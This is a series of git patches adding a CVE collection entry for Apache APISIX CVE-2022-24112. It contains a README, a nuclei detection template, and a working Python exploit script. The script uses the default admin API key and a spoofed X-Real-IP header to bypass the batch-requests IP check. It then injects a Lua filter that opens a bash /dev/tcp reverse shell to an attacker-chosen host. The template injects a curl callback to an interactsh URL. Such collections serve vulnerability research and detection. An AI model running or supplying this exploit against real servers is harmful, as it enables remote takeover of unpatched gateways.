From 68ff42c8822c8e09f8a4b6c6592face429f530f1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E4=B8=A5=E5=B7=9E=E6=89=AC?= Date: Sat, 25 Mar 2023 14:49:39 +0000 Subject: [PATCH 01/13] =?UTF-8?q?=E6=96=B0=E5=BB=BA=202022?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Apache-APISIX/2022/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/Apache-APISIX/2022/.keep diff --git a/cve/Apache-APISIX/2022/.keep b/cve/Apache-APISIX/2022/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 771a0d9ae01c6e85497644cf2d451dbc438f46ea Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E4=B8=A5=E5=B7=9E=E6=89=AC?= Date: Sat, 25 Mar 2023 14:53:50 +0000 Subject: [PATCH 02/13] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20cve-2022-24112?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Apache-APISIX/2022/cve-2022-24112/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/Apache-APISIX/2022/cve-2022-24112/.keep diff --git a/cve/Apache-APISIX/2022/cve-2022-24112/.keep b/cve/Apache-APISIX/2022/cve-2022-24112/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From c886d67b31c2e3034da311553f6039f09a9dee34 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E4=B8=A5=E5=B7=9E=E6=89=AC?= Date: Sat, 25 Mar 2023 14:55:32 +0000 Subject: [PATCH 03/13] add CVE-2022-24112 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 严州扬 --- .../2022/cve-2022-24112/README.md | 21 +++++ .../2022/cve-2022-24112/apisix-exploit.py | 79 +++++++++++++++++++ 2 files changed, 100 insertions(+) create mode 100644 cve/Apache-APISIX/2022/cve-2022-24112/README.md create mode 100644 cve/Apache-APISIX/2022/cve-2022-24112/apisix-exploit.py diff --git a/cve/Apache-APISIX/2022/cve-2022-24112/README.md b/cve/Apache-APISIX/2022/cve-2022-24112/README.md new file mode 100644 index 00000000..c099b392 --- /dev/null +++ b/cve/Apache-APISIX/2022/cve-2022-24112/README.md @@ -0,0 +1,21 @@ +# Apache APISIX Remote Code Execution (CVE-2022-24112) Exploit + +## Summary +An attacker can abuse the batch-requests plugin to send requests to +bypass the IP restriction of Admin API. +A default configuration of Apache APISIX (with default API key) is +vulnerable to remote code execution. +When the admin key was changed or the port of Admin API was changed to +a port different from the data panel, the impact is lower. But there +is still a risk to bypass the IP restriction of Apache APISIX's data +panel. + +There is a check in the batch-requests plugin which overrides the +client IP with its real remote IP. But due to a bug in the code, this +check can be bypassed. + +## Remediation +upgrade to 2.10.4 or 2.12.1. + + + diff --git a/cve/Apache-APISIX/2022/cve-2022-24112/apisix-exploit.py b/cve/Apache-APISIX/2022/cve-2022-24112/apisix-exploit.py new file mode 100644 index 00000000..d8528165 --- /dev/null +++ b/cve/Apache-APISIX/2022/cve-2022-24112/apisix-exploit.py @@ -0,0 +1,79 @@ +import requests +import sys + + +class color: + HEADER = '\033[95m' + IMPORTANT = '\33[35m' + NOTICE = '\033[33m' + OKBLUE = '\033[94m' + OKGREEN = '\033[92m' + WARNING = '\033[93m' + RED = '\033[91m' + END = '\033[0m' + UNDERLINE = '\033[4m' + LOGGING = '\33[34m' +color_random=[color.HEADER,color.IMPORTANT,color.NOTICE,color.OKBLUE,color.OKGREEN,color.WARNING,color.RED,color.END,color.UNDERLINE,color.LOGGING] + + +def banner(): + run = color_random[6]+'''\n . , + _.._ * __*\./ ___ _ \./._ | _ *-+- + (_][_)|_) |/'\ (/,/'\[_)|(_)| | + | | +\n''' + run2 = color_random[2]+'''\t\t(CVE-2022-24112)\n''' + run3 = color_random[4]+'''{ Coded By: Ven3xy | Github: https://github.com/M4xSec/ }\n\n''' + print(run+run2+run3) + +if (len(sys.argv) != 4): + banner() + print("[!] Usage : ./apisix-exploit.py ") + exit() + +else: + banner() + target_url = sys.argv[1] + lhost = sys.argv[2] + lport = sys.argv[3] + +headers1 = { + 'Host': '127.0.0.1:8080', + 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.81 Safari/537.36 Edg/97.0.1072.69', + 'X-API-KEY': 'edd1c9f034335f136f87ad84b625c8f1', + 'Accept': '*/*', + 'Accept-Encoding': 'gzip, deflate', + 'Content-Type': 'application/json', + 'Content-Length': '540', + 'Connection': 'close', +} + +headers2 = { + 'Host': '127.0.0.1:8080', + 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.81 Safari/537.36 Edg/97.0.1072.69', + 'X-API-KEY': 'edd1c9f034335f136f87ad84b625c8f1', + 'Accept': '*/*', + 'Accept-Encoding': 'gzip, deflate', + 'Content-Type': 'application/json', + 'Connection': 'close', +} + +json_data = { + 'headers': { + 'X-Real-IP': '127.0.0.1', + 'X-API-KEY': 'edd1c9f034335f136f87ad84b625c8f1', + 'Content-Type': 'application/json', + }, + 'timeout': 1500, + 'pipeline': [ + { + 'path': '/apisix/admin/routes/index', + 'method': 'PUT', + 'body': '{"uri":"/rms/fzxewh","upstream":{"type":"roundrobin","nodes":{"schmidt-schaefer.com":1}},"name":"wthtzv","filter_func":"function(vars) os.execute(\'bash -c \\\\\\"0<&160-;exec 160<>/dev/tcp/'+lhost+'/'+lport+';sh <&160 >&160 2>&160\\\\\\"\'); return true end"}', + }, + ], +} + +response1 = requests.post(target_url+'apisix/batch-requests', headers=headers1, json=json_data, verify=False) + +response2 = requests.get(target_url+'rms/fzxewh', headers=headers2, verify=False) -- Gitee From 81b6b58bfe124a55a19839a4e1d937ab6fc7733d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E4=B8=A5=E5=B7=9E=E6=89=AC?= Date: Sat, 25 Mar 2023 14:55:40 +0000 Subject: [PATCH 04/13] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/Apache-APISIX/2022/cve-2022-24112/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Apache-APISIX/2022/cve-2022-24112/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/Apache-APISIX/2022/cve-2022-24112/.keep diff --git a/cve/Apache-APISIX/2022/cve-2022-24112/.keep b/cve/Apache-APISIX/2022/cve-2022-24112/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From a6d5d4d545244c7aff317516acf856aa6cb9c112 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E4=B8=A5=E5=B7=9E=E6=89=AC?= Date: Sat, 25 Mar 2023 14:55:47 +0000 Subject: [PATCH 05/13] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/Apache-APISIX/2022/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Apache-APISIX/2022/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/Apache-APISIX/2022/.keep diff --git a/cve/Apache-APISIX/2022/.keep b/cve/Apache-APISIX/2022/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From d4aa862f00939aca1c1967c9504089a92825add8 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E4=B8=A5=E5=B7=9E=E6=89=AC?= Date: Sat, 25 Mar 2023 14:56:25 +0000 Subject: [PATCH 06/13] add CVE-2022-24112 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 严州扬 --- cve/Apache-APISIX/2022/CVE-2022-24112.yaml | 54 ++++++++++++++++++++++ 1 file changed, 54 insertions(+) create mode 100644 cve/Apache-APISIX/2022/CVE-2022-24112.yaml diff --git a/cve/Apache-APISIX/2022/CVE-2022-24112.yaml b/cve/Apache-APISIX/2022/CVE-2022-24112.yaml new file mode 100644 index 00000000..a2d9ab83 --- /dev/null +++ b/cve/Apache-APISIX/2022/CVE-2022-24112.yaml @@ -0,0 +1,54 @@ +id: CVE-2022-24112 + +info: + name: Apache APISIX apisix/batch-requests RCE + description: Apache APISIX apisix/batch-requests plugin allows overwriting the X-REAL-IP header to RCE;An attacker can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. When the admin key was changed or the port of Admin API was changed to a port different from the data panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX's data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote IP. But due to a bug in the code, this check can be bypassed. + author: Mr-xn + severity: critical + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-24112 + - https://www.openwall.com/lists/oss-security/2022/02/11/3 + - https://twitter.com/sirifu4k1/status/1496043663704858625 + - https://apisix.apache.org/zh/docs/apisix/plugins/batch-requests + + tags: cve,cve2022,apache,rce,apisix + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2022-24112 + cwe-id: CWE-290 + +requests: + - raw: + - | + POST /apisix/batch-requests HTTP/1.1 + Host: {{Host}}:9080 + Content-Type: application/json + Accept-Encoding: gzip, deflate + Accept-Language: zh-CN,zh;q=0.9 + Connection: close + + {"headers":{"X-Real-IP":"127.0.0.1","Content-Type":"application/json"},"timeout":1500,"pipeline":[{"method":"PUT","path":"/apisix/admin/routes/index?api_key=edd1c9f034335f136f87ad84b625c8f1","body":"{\r\n \"name\": \"test\", \"method\": [\"GET\"],\r\n \"uri\": \"/api/test\",\r\n \"upstream\":{\"type\":\"roundrobin\",\"nodes\":{\"httpbin.org:80\":1}}\r\n,\r\n\"filter_func\": \"function(vars) os.execute('curl {{randstr}}.{{interactsh-url}}'); return true end\"}"}]} + - | + GET /api/test HTTP/1.1 + Host: {{Host}}:9080 + Accept-Encoding: gzip, deflate + Accept-Language: zh-CN,zh;q=0.9 + Connection: close + + redirects: false + + matchers-condition: and + req-condition: true + matchers: + - type: dsl + dsl: + - "status_code_1 == 200" + # - "status_code_2 == 404" + - 'contains(body_1, "{{randstr}}")' + # - 'contains(body_1, "\"status\":200,\"reason\":\"OK\"}")' + condition: and + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" -- Gitee From b44053992e1450aa2b230b75568932093b1461db Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E4=B8=A5=E5=B7=9E=E6=89=AC?= Date: Sat, 25 Mar 2023 14:56:49 +0000 Subject: [PATCH 07/13] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/Apache-APISIX/2022/CVE-2022-24112.yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Apache-APISIX/2022/CVE-2022-24112.yaml | 54 ---------------------- 1 file changed, 54 deletions(-) delete mode 100644 cve/Apache-APISIX/2022/CVE-2022-24112.yaml diff --git a/cve/Apache-APISIX/2022/CVE-2022-24112.yaml b/cve/Apache-APISIX/2022/CVE-2022-24112.yaml deleted file mode 100644 index a2d9ab83..00000000 --- a/cve/Apache-APISIX/2022/CVE-2022-24112.yaml +++ /dev/null @@ -1,54 +0,0 @@ -id: CVE-2022-24112 - -info: - name: Apache APISIX apisix/batch-requests RCE - description: Apache APISIX apisix/batch-requests plugin allows overwriting the X-REAL-IP header to RCE;An attacker can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. When the admin key was changed or the port of Admin API was changed to a port different from the data panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX's data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote IP. But due to a bug in the code, this check can be bypassed. - author: Mr-xn - severity: critical - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2022-24112 - - https://www.openwall.com/lists/oss-security/2022/02/11/3 - - https://twitter.com/sirifu4k1/status/1496043663704858625 - - https://apisix.apache.org/zh/docs/apisix/plugins/batch-requests - - tags: cve,cve2022,apache,rce,apisix - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2022-24112 - cwe-id: CWE-290 - -requests: - - raw: - - | - POST /apisix/batch-requests HTTP/1.1 - Host: {{Host}}:9080 - Content-Type: application/json - Accept-Encoding: gzip, deflate - Accept-Language: zh-CN,zh;q=0.9 - Connection: close - - {"headers":{"X-Real-IP":"127.0.0.1","Content-Type":"application/json"},"timeout":1500,"pipeline":[{"method":"PUT","path":"/apisix/admin/routes/index?api_key=edd1c9f034335f136f87ad84b625c8f1","body":"{\r\n \"name\": \"test\", \"method\": [\"GET\"],\r\n \"uri\": \"/api/test\",\r\n \"upstream\":{\"type\":\"roundrobin\",\"nodes\":{\"httpbin.org:80\":1}}\r\n,\r\n\"filter_func\": \"function(vars) os.execute('curl {{randstr}}.{{interactsh-url}}'); return true end\"}"}]} - - | - GET /api/test HTTP/1.1 - Host: {{Host}}:9080 - Accept-Encoding: gzip, deflate - Accept-Language: zh-CN,zh;q=0.9 - Connection: close - - redirects: false - - matchers-condition: and - req-condition: true - matchers: - - type: dsl - dsl: - - "status_code_1 == 200" - # - "status_code_2 == 404" - - 'contains(body_1, "{{randstr}}")' - # - 'contains(body_1, "\"status\":200,\"reason\":\"OK\"}")' - condition: and - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" -- Gitee From 7c0ea6980e4a7854c56dba8579d0fe4304ea6344 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E4=B8=A5=E5=B7=9E=E6=89=AC?= Date: Sat, 25 Mar 2023 14:56:56 +0000 Subject: [PATCH 08/13] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Apache-APISIX/2022/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/Apache-APISIX/2022/yaml/.keep diff --git a/cve/Apache-APISIX/2022/yaml/.keep b/cve/Apache-APISIX/2022/yaml/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 1c62fe32c7dbb8271ec73265f5543bfb99a9e2a8 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E4=B8=A5=E5=B7=9E=E6=89=AC?= Date: Sat, 25 Mar 2023 14:57:15 +0000 Subject: [PATCH 09/13] add CVE-2022-24112 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 严州扬 --- .../2022/yaml/CVE-2022-24112.yaml | 54 +++++++++++++++++++ 1 file changed, 54 insertions(+) create mode 100644 cve/Apache-APISIX/2022/yaml/CVE-2022-24112.yaml diff --git a/cve/Apache-APISIX/2022/yaml/CVE-2022-24112.yaml b/cve/Apache-APISIX/2022/yaml/CVE-2022-24112.yaml new file mode 100644 index 00000000..a2d9ab83 --- /dev/null +++ b/cve/Apache-APISIX/2022/yaml/CVE-2022-24112.yaml @@ -0,0 +1,54 @@ +id: CVE-2022-24112 + +info: + name: Apache APISIX apisix/batch-requests RCE + description: Apache APISIX apisix/batch-requests plugin allows overwriting the X-REAL-IP header to RCE;An attacker can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. When the admin key was changed or the port of Admin API was changed to a port different from the data panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX's data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote IP. But due to a bug in the code, this check can be bypassed. + author: Mr-xn + severity: critical + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-24112 + - https://www.openwall.com/lists/oss-security/2022/02/11/3 + - https://twitter.com/sirifu4k1/status/1496043663704858625 + - https://apisix.apache.org/zh/docs/apisix/plugins/batch-requests + + tags: cve,cve2022,apache,rce,apisix + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2022-24112 + cwe-id: CWE-290 + +requests: + - raw: + - | + POST /apisix/batch-requests HTTP/1.1 + Host: {{Host}}:9080 + Content-Type: application/json + Accept-Encoding: gzip, deflate + Accept-Language: zh-CN,zh;q=0.9 + Connection: close + + {"headers":{"X-Real-IP":"127.0.0.1","Content-Type":"application/json"},"timeout":1500,"pipeline":[{"method":"PUT","path":"/apisix/admin/routes/index?api_key=edd1c9f034335f136f87ad84b625c8f1","body":"{\r\n \"name\": \"test\", \"method\": [\"GET\"],\r\n \"uri\": \"/api/test\",\r\n \"upstream\":{\"type\":\"roundrobin\",\"nodes\":{\"httpbin.org:80\":1}}\r\n,\r\n\"filter_func\": \"function(vars) os.execute('curl {{randstr}}.{{interactsh-url}}'); return true end\"}"}]} + - | + GET /api/test HTTP/1.1 + Host: {{Host}}:9080 + Accept-Encoding: gzip, deflate + Accept-Language: zh-CN,zh;q=0.9 + Connection: close + + redirects: false + + matchers-condition: and + req-condition: true + matchers: + - type: dsl + dsl: + - "status_code_1 == 200" + # - "status_code_2 == 404" + - 'contains(body_1, "{{randstr}}")' + # - 'contains(body_1, "\"status\":200,\"reason\":\"OK\"}")' + condition: and + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" -- Gitee From 7d0b97042078fa0b4ebd8435e9a0885c46ab0926 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E4=B8=A5=E5=B7=9E=E6=89=AC?= Date: Sat, 25 Mar 2023 14:57:21 +0000 Subject: [PATCH 10/13] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/Apache-APISIX/2022/yaml/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Apache-APISIX/2022/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/Apache-APISIX/2022/yaml/.keep diff --git a/cve/Apache-APISIX/2022/yaml/.keep b/cve/Apache-APISIX/2022/yaml/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From a29879b5181196eb6bc64440975cda24f458b3d5 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E4=B8=A5=E5=B7=9E=E6=89=AC?= Date: Fri, 7 Apr 2023 03:53:31 +0000 Subject: [PATCH 11/13] update cve/Apache-APISIX/2022/yaml/CVE-2022-24112.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 严州扬 --- .../2022/yaml/CVE-2022-24112.yaml | 46 +++---------------- 1 file changed, 6 insertions(+), 40 deletions(-) diff --git a/cve/Apache-APISIX/2022/yaml/CVE-2022-24112.yaml b/cve/Apache-APISIX/2022/yaml/CVE-2022-24112.yaml index a2d9ab83..b40c0770 100644 --- a/cve/Apache-APISIX/2022/yaml/CVE-2022-24112.yaml +++ b/cve/Apache-APISIX/2022/yaml/CVE-2022-24112.yaml @@ -1,54 +1,20 @@ id: CVE-2022-24112 - +source: https://github.com/M4xSec/Apache-APISIX-CVE-2022-24112 info: - name: Apache APISIX apisix/batch-requests RCE - description: Apache APISIX apisix/batch-requests plugin allows overwriting the X-REAL-IP header to RCE;An attacker can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. When the admin key was changed or the port of Admin API was changed to a port different from the data panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX's data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote IP. But due to a bug in the code, this check can be bypassed. - author: Mr-xn + name: Apache APISIX APISIX/batch请求RCE severity: critical + description: Apache APISIX APISIX/batch requests插件允许将X-REAL-IP头重写为RCE;攻击者可以滥用批处理请求插件发送请求以绕过Admin API的IP限制。Apache APISIX的默认配置(带有默认API密钥)易受远程代码执行的攻击。当管理密钥被更改或管理API的端口被更改为不同于数据面板的端口时,影响较小。但绕过Apache APISIX数据面板的IP限制仍然存在风险。在批处理请求插件中有一个检查,它用实际的远程IP覆盖客户端IP。但由于代码中的一个错误,可以绕过此检查。 + reference: - https://nvd.nist.gov/vuln/detail/CVE-2022-24112 - https://www.openwall.com/lists/oss-security/2022/02/11/3 - https://twitter.com/sirifu4k1/status/1496043663704858625 - https://apisix.apache.org/zh/docs/apisix/plugins/batch-requests - tags: cve,cve2022,apache,rce,apisix + classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 cve-id: CVE-2022-24112 cwe-id: CWE-290 - -requests: - - raw: - - | - POST /apisix/batch-requests HTTP/1.1 - Host: {{Host}}:9080 - Content-Type: application/json - Accept-Encoding: gzip, deflate - Accept-Language: zh-CN,zh;q=0.9 - Connection: close - - {"headers":{"X-Real-IP":"127.0.0.1","Content-Type":"application/json"},"timeout":1500,"pipeline":[{"method":"PUT","path":"/apisix/admin/routes/index?api_key=edd1c9f034335f136f87ad84b625c8f1","body":"{\r\n \"name\": \"test\", \"method\": [\"GET\"],\r\n \"uri\": \"/api/test\",\r\n \"upstream\":{\"type\":\"roundrobin\",\"nodes\":{\"httpbin.org:80\":1}}\r\n,\r\n\"filter_func\": \"function(vars) os.execute('curl {{randstr}}.{{interactsh-url}}'); return true end\"}"}]} - - | - GET /api/test HTTP/1.1 - Host: {{Host}}:9080 - Accept-Encoding: gzip, deflate - Accept-Language: zh-CN,zh;q=0.9 - Connection: close - - redirects: false - - matchers-condition: and - req-condition: true - matchers: - - type: dsl - dsl: - - "status_code_1 == 200" - # - "status_code_2 == 404" - - 'contains(body_1, "{{randstr}}")' - # - 'contains(body_1, "\"status\":200,\"reason\":\"OK\"}")' - condition: and - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" + tags: cve2022 \ No newline at end of file -- Gitee From adc371cdf372728f53feb459a886961bfe13381c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E4=B8=A5=E5=B7=9E=E6=89=AC?= Date: Sat, 15 Apr 2023 13:01:49 +0000 Subject: [PATCH 12/13] update cve/Apache-APISIX/2022/yaml/CVE-2022-24112.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 严州扬 --- cve/Apache-APISIX/2022/yaml/CVE-2022-24112.yaml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/cve/Apache-APISIX/2022/yaml/CVE-2022-24112.yaml b/cve/Apache-APISIX/2022/yaml/CVE-2022-24112.yaml index b40c0770..670cbd6f 100644 --- a/cve/Apache-APISIX/2022/yaml/CVE-2022-24112.yaml +++ b/cve/Apache-APISIX/2022/yaml/CVE-2022-24112.yaml @@ -4,17 +4,16 @@ info: name: Apache APISIX APISIX/batch请求RCE severity: critical description: Apache APISIX APISIX/batch requests插件允许将X-REAL-IP头重写为RCE;攻击者可以滥用批处理请求插件发送请求以绕过Admin API的IP限制。Apache APISIX的默认配置(带有默认API密钥)易受远程代码执行的攻击。当管理密钥被更改或管理API的端口被更改为不同于数据面板的端口时,影响较小。但绕过Apache APISIX数据面板的IP限制仍然存在风险。在批处理请求插件中有一个检查,它用实际的远程IP覆盖客户端IP。但由于代码中的一个错误,可以绕过此检查。 - reference: - https://nvd.nist.gov/vuln/detail/CVE-2022-24112 - https://www.openwall.com/lists/oss-security/2022/02/11/3 - https://twitter.com/sirifu4k1/status/1496043663704858625 - https://apisix.apache.org/zh/docs/apisix/plugins/batch-requests - - classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 cve-id: CVE-2022-24112 cwe-id: CWE-290 + cnvd-id: None + kve-id: None tags: cve2022 \ No newline at end of file -- Gitee From c0915af7cb9204716e27b6672872f927600b8948 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E4=B8=A5=E5=B7=9E=E6=89=AC?= Date: Sat, 15 Apr 2023 13:02:29 +0000 Subject: [PATCH 13/13] update cve/Apache-APISIX/2022/yaml/CVE-2022-24112.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 严州扬 --- cve/Apache-APISIX/2022/yaml/CVE-2022-24112.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cve/Apache-APISIX/2022/yaml/CVE-2022-24112.yaml b/cve/Apache-APISIX/2022/yaml/CVE-2022-24112.yaml index 670cbd6f..883d103f 100644 --- a/cve/Apache-APISIX/2022/yaml/CVE-2022-24112.yaml +++ b/cve/Apache-APISIX/2022/yaml/CVE-2022-24112.yaml @@ -1,7 +1,7 @@ id: CVE-2022-24112 source: https://github.com/M4xSec/Apache-APISIX-CVE-2022-24112 info: - name: Apache APISIX APISIX/batch请求RCE + name: Apache APISIX Dashboard 是 Apache APISIX 网关的可视化管理界面 severity: critical description: Apache APISIX APISIX/batch requests插件允许将X-REAL-IP头重写为RCE;攻击者可以滥用批处理请求插件发送请求以绕过Admin API的IP限制。Apache APISIX的默认配置(带有默认API密钥)易受远程代码执行的攻击。当管理密钥被更改或管理API的端口被更改为不同于数据面板的端口时,影响较小。但绕过Apache APISIX数据面板的IP限制仍然存在风险。在批处理请求插件中有一个检查,它用实际的远程IP覆盖客户端IP。但由于代码中的一个错误,可以绕过此检查。 reference: -- Gitee